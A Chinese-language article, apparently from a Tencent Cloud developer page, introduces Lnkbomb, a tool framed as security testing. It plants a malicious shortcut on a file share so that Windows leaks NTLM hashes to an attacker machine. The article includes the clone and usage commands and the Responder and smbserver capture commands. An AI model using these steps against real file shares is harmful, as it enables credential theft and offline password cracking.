在很多情况下,内外部网络系统中文件共享的安全问题经常会被管理员所忽略。Lnkbomb作为一款功能强大的安全测试工具,可以帮助广大研究人员通过生成安全测试用的快捷方式,并尝试从目标文件共享中收集NTLM哈希来测试文件共享的安全性能。
首先,Lnkbomb可以生成一个用于测试的快捷方式文件,并将其上传到目标(不安全)的文件共享。接下来根据Windows操作系统的运行机制,Windows系统将会寻找一个跟该快捷方式文件相关联的图标文件。这个图标文件将能够定向到运行了Responder或smbserver之类工具的安全测试设备上,以实现NTLMv1或NTLMv2哈希的收集操作,具体将取决于目标主机的配置。最后,安全研究人员就可以使用Hashcat之类的工具尝试对其进行离线破解了。
在整个过程中,安全研究人员需要在Payload文件中写入目标设备的IP地址,然后直接将Payload文件通过命令行工具上传到目标文件共享中。
该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好Python 3环境。
接下来,广大研究人员就可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/dievus/lnkbomb.git
注意:该工具在Windows平台上可以正常运行,在Linux平台上运行可能会遇到一些问题。
打开命令行工具,切换到项目根目录后,运行下列命令即可查看工具的帮助信息:
python3 lnkbomb.py -h
上述命令将打开工具的帮助菜单,其中将包含下列参数选项:
-h, --help:查看工具帮助选项 -t, --target:指定目标文件共享位置,例如 -t \\192.168.1.1\Share -a, --attacker:指定测试人员的设备地址,例如 -a 192.168.1.2 -r, --recover:测试完成后,移除Payload文件,例如 -r randomfilegenerated.recover
python3 lnkbomb.py -t \\192.168.1.1\Share -a 192.168.1.2
python3 lnkbomb.py -r randomfilegenerated.recover
如果你需要使用Responder或smbserver之类的工具来捕捉NTLM哈希的话,可以运行下列命令:
responder -I eth0 -dwf -v
或:
smbserver.py . . -smb2support
广大研究人员也可以直接从该项目的【Releases页面】下载Lnkbomb已编译好的可执行文件,所有的运行参数选项和命令行工具的使用是一样的,只不过运行的时候是通过双击lnkbomb.exe实现,而不是运行“python3 lnkbomb.py”命令。
本项目的开发与发布遵循MIT开源许可证协议。
https://github.com/dievus/lnkbomb
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有